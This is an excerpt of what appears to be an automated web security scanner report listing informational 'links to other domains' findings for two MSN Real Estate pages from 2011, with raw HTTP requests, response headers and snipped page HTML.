<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345039&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Frealestate.redacted%2Farticle.aspx%3Fcp-documentid%3D26575425%26GT1%3D35006&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com?form=SYNDRE"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=fannie+freddie+backlog&form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Foreclosure+activity+up+us+metro+areas&form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=2011+housing+market+flat&form=SYNDRE"><span class="custom">
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Home-loan+program+oversight&form=SYNDRE"><span class="custom">
...[SNIP]...
<p class="partnerlogo cf"><a href="http://businessweek.com/" onclick="return Msn.Navigation.OpenPopup(event,this)"><img src="http://blstb.redacted/i/2A/E3C886CAF6B03CEE763CBA591FEE6.jpg" alt="Businessweek.com" />
...[SNIP]...
<cite>By..Venessa Wong..of..<a href="http://businessweek.com/" onclick="return Msn.Navigation.OpenPopup(event,this)">Bloomberg Businessweek</a>
...[SNIP]...
<li class="first"><a href="http://images.businessweek.com/slideshows/20101027/twenty-best-places-to-start-over-2010/?campaign_id=msn">20 best places to start over</a>
...[SNIP]...
<li><a href="http://images.businessweek.com/ss/10/09/0930_discount_condos/index.htm?campaign_id=msn">America's most discounted luxury apartments</a>
...[SNIP]...
<li class="last"><a href="http://images.businessweek.com/ss/10/10/1007_highest_incomes/index.htm?campaign_id=msn">America's highest-income cities by state</a>
...[SNIP]...
</strong> <a href="http://www.bing.com/search?q=buy+new+or+existing+home&form=MSREAL">Is it better to buy a new home or existing one?</a>
...[SNIP]...
ts in states such as North Carolina, Florida, California, Nevada and Colorado. The communities range from single-family developments to retirement communities with more than 700 units in Las Vegas and <a href="http://www.bing.com/search?q=Groveland%2C+Fla.&form+MSREAL" onclick="window.open(this.href);return false;">Groveland, Fla.</a>
...[SNIP]...
<td><link rel="Stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" /><div id='PlayerAd1Container'></div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">See Businessweek.com's full list of where builders and investors foresee demand for new housing.</a>
...[SNIP]...
<em>Become a fan of MSN Real Estate on <a href="http://www.facebook.com/msnrealestate" onclick="window.open(this.href);return false;">Facebook</a> and follow us on <a href="http://www.twitter.com/msnrealestate" onclick="window.open(this.href);return false;">Twitter</a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XuTUE6Z__V9Jc2UnXh375rHRdBFs1Du5c?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHVE1zEAybroE5iE-mn_lGXL7Ff0LtJWG?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHVE1zEAybroE5iE-mn_lGXL7Ff0LtJWG?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XRJeEsaeX0k4CpjGoiuwKI3_2t4TLv8xC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://twitter.com/msnrealestate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">Follow us</a> on Twitter and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://facebook.com/MSNRealEstate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">become a fan</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN privacy</a>
...[SNIP]...
<div><img src="http://msnportalrealest.112.2O7.net/b/ss/msnportalrealest/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.287. http://realestate.redacted/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.redacted
Path:	/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://realestate.redacted/article.aspx?cp-documentid=26575425&GT1=35006

The response contains the following links to other domains:

http://businessweek.com/
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://cid-ec1f93fc4f4d26d0.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://download.live.com/?sku=messenger
http://facebook.com/MSNRealEstate?ocid=TXT_MSNCH_REALESTATE_FollowMSN
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://images.businessweek.com/slideshows/20101027/twenty-best-places-to-start-over-2010/?campaign_id=msn
http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm
http://images.businessweek.com/ss/10/09/0930_discount_condos/index.htm?campaign_id=msn
http://images.businessweek.com/ss/10/10/1007_highest_incomes/index.htm?campaign_id=msn
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalrealest.112.2o7.net/b/ss/msnportalrealest/1/H.1--NS/0
http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js
http://twitter.com/msnrealestate?ocid=TXT_MSNCH_REALESTATE_FollowMSN
http://us.social.s-msn.com/s/images/bluemannxl.png
http://www.bing.com/?form=SYNDRE
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=MSREAL
http://www.bing.com/search?q=2011+housing+market+flat&form=SYNDRE
http://www.bing.com/search?q=Foreclosure+activity+up+us+metro+areas&form=SYNDRE
http://www.bing.com/search?q=Groveland%2C+Fla.&form+MSREAL
http://www.bing.com/search?q=Home-loan+program+oversight&form=SYNDRE
http://www.bing.com/search?q=buy+new+or+existing+home&form=MSREAL
http://www.bing.com/search?q=fannie+freddie+backlog&form=SYNDRE
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/msnrealestate
http://www.myhomeredacted/
http://www.twitter.com/msnrealestate
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406638&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Frealestate.redacted%2Farticle.aspx%3Fcp-documentid%3D26575425%26GT1%3D35006&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /article.aspx?cp-documentid=26575425&GT1=35006 HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=7eee375b1d22407bbacfe1374251ce3c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=323AB19601DE4D52A270DC812E6673C9; domain=.redacted; expires=Thu, 18-Aug-2011 16:57:18 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 63026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MSREAL">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406638&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Frealestate.redacted%2Farticle.aspx%3Fcp-documentid%3D26575425%26GT1%3D35006&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com?form=SYNDRE"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=fannie+freddie+backlog&form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Foreclosure+activity+up+us+metro+areas&form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=2011+housing+market+flat&form=SYNDRE"><span class="custom">
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Home-loan+program+oversight&form=SYNDRE"><span class="custom">
...[SNIP]...
<p class="partnerlogo cf"><a href="http://businessweek.com/" onclick="return Msn.Navigation.OpenPopup(event,this)"><img src="http://blstb.redacted/i/2A/E3C886CAF6B03CEE763CBA591FEE6.jpg" alt="Businessweek.com" />
...[SNIP]...
<cite>By..Venessa Wong..of..<a href="http://businessweek.com/" onclick="return Msn.Navigation.OpenPopup(event,this)">Bloomberg Businessweek</a>
...[SNIP]...
<li class="first"><a href="http://images.businessweek.com/slideshows/20101027/twenty-best-places-to-start-over-2010/?campaign_id=msn">20 best places to start over</a>
...[SNIP]...
<li><a href="http://images.businessweek.com/ss/10/09/0930_discount_condos/index.htm?campaign_id=msn">America's most discounted luxury apartments</a>
...[SNIP]...
<li class="last"><a href="http://images.businessweek.com/ss/10/10/1007_highest_incomes/index.htm?campaign_id=msn">America's highest-income cities by state</a>
...[SNIP]...
</strong> <a href="http://www.bing.com/search?q=buy+new+or+existing+home&form=MSREAL">Is it better to buy a new home or existing one?</a>
...[SNIP]...
ts in states such as North Carolina, Florida, California, Nevada and Colorado. The communities range from single-family developments to retirement communities with more than 700 units in Las Vegas and <a href="http://www.bing.com/search?q=Groveland%2C+Fla.&form+MSREAL" onclick="window.open(this.href);return false;">Groveland, Fla.</a>
...[SNIP]...
<td><link rel="Stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" /><div id='PlayerAd1Container'></div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">See Businessweek.com's full list of where builders and investors foresee demand for new housing.</a>
...[SNIP]...
<em>Become a fan of MSN Real Estate on <a href="http://www.facebook.com/msnrealestate" onclick="window.open(this.href);return false;">Facebook</a> and follow us on <a href="http://www.twitter.com/msnrealestate" onclick="window.open(this.href);return false;">Twitter</a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-ec1f93fc4f4d26d0.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Winyanstaz Wakien
..(Wakien)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-ec1f93fc4f4d26d0.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1mKQnyHF_7rQeXkioV9t_arBbl9bXsM3TUfSKMj8qNlS3Hfvv76H4KUdBq9lZTft8Jg-S3MpkQXZw0NrY-oobTcw" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XuTUE6Z__V9Jc2UnXh375rHRdBFs1Du5c?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHVE1zEAybroE5iE-mn_lGXL7Ff0LtJWG?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHVE1zEAybroE5iE-mn_lGXL7Ff0LtJWG?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XRJeEsaeX0k4CpjGoiuwKI3_2t4TLv8xC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://twitter.com/msnrealestate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">Follow us</a> on Twitter and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://facebook.com/MSNRealEstate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">become a fan</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN privacy</a>
...[SNIP]...
<div><img src="http://msnportalrealest.112.2O7.net/b/ss/msnportalrealest/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.288. http://realestate.redacted/slideshow.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.redacted
Path:	/slideshow.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://realestate.redacted/slideshow.aspx?cp-documentid=26575521&GT1=35006

The response contains the following links to other domains:

http://businessweek.com/
http://cid-011831ffce31112c.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-aadae429816198d4.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cpwliving.com/
http://delwebb.com/communities/tx/richmond/del-webb-houston/index.aspx
http://download.live.com/?sku=messenger
http://facebook.com/MSNRealEstate?ocid=TXT_MSNCH_REALESTATE_FollowMSN
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://images.businessweek.com/slideshows/20101027/twenty-best-places-to-start-over-2010/?campaign_id=msn
http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm
http://images.businessweek.com/ss/10/09/0930_discount_condos/index.htm?campaign_id=msn
http://images.businessweek.com/ss/10/10/1007_highest_incomes/index.htm?campaign_id=msn
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalrealest.112.2o7.net/b/ss/msnportalrealest/1/H.1--NS/0
http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js
http://twitter.com/msnrealestate?ocid=TXT_MSNCH_REALESTATE_FollowMSN
http://us.social.s-msn.com/s/images/bluemannxl.png
http://us.social.s-msn.com/s/images/emoticons/49_49.gif
http://www.bing.com/?form=SYNDRE
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=MSREAL
http://www.bing.com/search?q=2011+housing+market+flat&form=SYNDRE
http://www.bing.com/search?q=Foreclosure+activity+up+us+metro+areas&form=SYNDRE
http://www.bing.com/search?q=Home-loan+program+oversight&form=SYNDRE
http://www.bing.com/search?q=Median+Home+Prices+by+State&FORM=MSREAL
http://www.bing.com/search?q=apex%2C+n.c.&go=&form=MSREAL
http://www.bing.com/search?q=fannie+freddie+backlog&form=SYNDRE
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345038&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Frealestate.redacted%2Fslideshow.aspx%3Fcp-documentid%3D26575521%26GT1%3D35006&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /slideshow.aspx?cp-documentid=26575521&GT1=35006 HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:38 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA15
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=e6a7fa58f8b94050b87f463d0e8dd439; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5913AEC790E5421083D45541343E0655; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:38 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 90700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MSREAL">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345038&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Frealestate.redacted%2Fslideshow.aspx%3Fcp-documentid%3D26575521%26GT1%3D35006&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com?form=SYNDRE"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=fannie+freddie+backlog&form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Foreclosure+activity+up+us+metro+areas&form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=2011+housing+market+flat&form=SYNDRE"><span class="custom">
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Home-loan+program+oversight&form=SYNDRE"><span class="custom">
...[SNIP]...
<p class="partnerlogo cf"><a href="http://businessweek.com/" onclick="return Msn.Navigation.OpenPopup(event,this)"><img src="http://blstb.redacted/i/2A/E3C886CAF6B03CEE763CBA591FEE6.jpg" alt="Businessweek.com" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XbCErejGBG1rBcuXycQTC62Ud7gg-UXzC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XbCErejGBG1rBcuXycQTC62Ud7gg-UXzC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-aadae429816198d4.profile.live.com/msn/posts?mkt=en-US&domain=en-US">r o
..(slipknot5)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-aadae429816198d4.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-011831ffce31112c.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Mike
..(NVanHiker)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-011831ffce31112c.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XvgmAjW84eGy9BG6AfkU-R6gqzOZgVQ3S?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xe5O5VlyfapbVN-GEcOvz6W3nOdlWyW3t?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XH8Fy7nb0e1GxFNmsT2hMGXMVfxuBVI4B?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X49jbZo-ohyOnFTgS1AOCiqc8mMx2M0I-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XKxTYsjc84a0aG718B9_caPd4garD3zIY?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
is all I see in this story. some body simply can see some thing that they use allot of so they buy what they can, this is good for the economy, and what is good for the economy is good for all of us. <img src="http://us.social.s-redacted/s/images/emoticons/49_49.gif" alt="Nerd" class="emoticon" /></p>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XlyG_cmb52KYMyLTPt7bS5-_XZMr5zSgA?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<cite>By..Venessa Wong..of..<a href="http://businessweek.com/" onclick="return Msn.Navigation.OpenPopup(event,this)">Bloomberg Businessweek</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
</strong> <a href="http://www.bing.com/search?q=Median+Home+Prices+by+State&FORM=MSREAL" onclick="window.open(this.href);return false;">What's the median home price in your area?</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
</strong> <a href="http://delwebb.com/communities/tx/richmond/del-webb-houston/index.aspx" onclick="window.open(this.href);return false;">Del Webb Sweetgrass</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
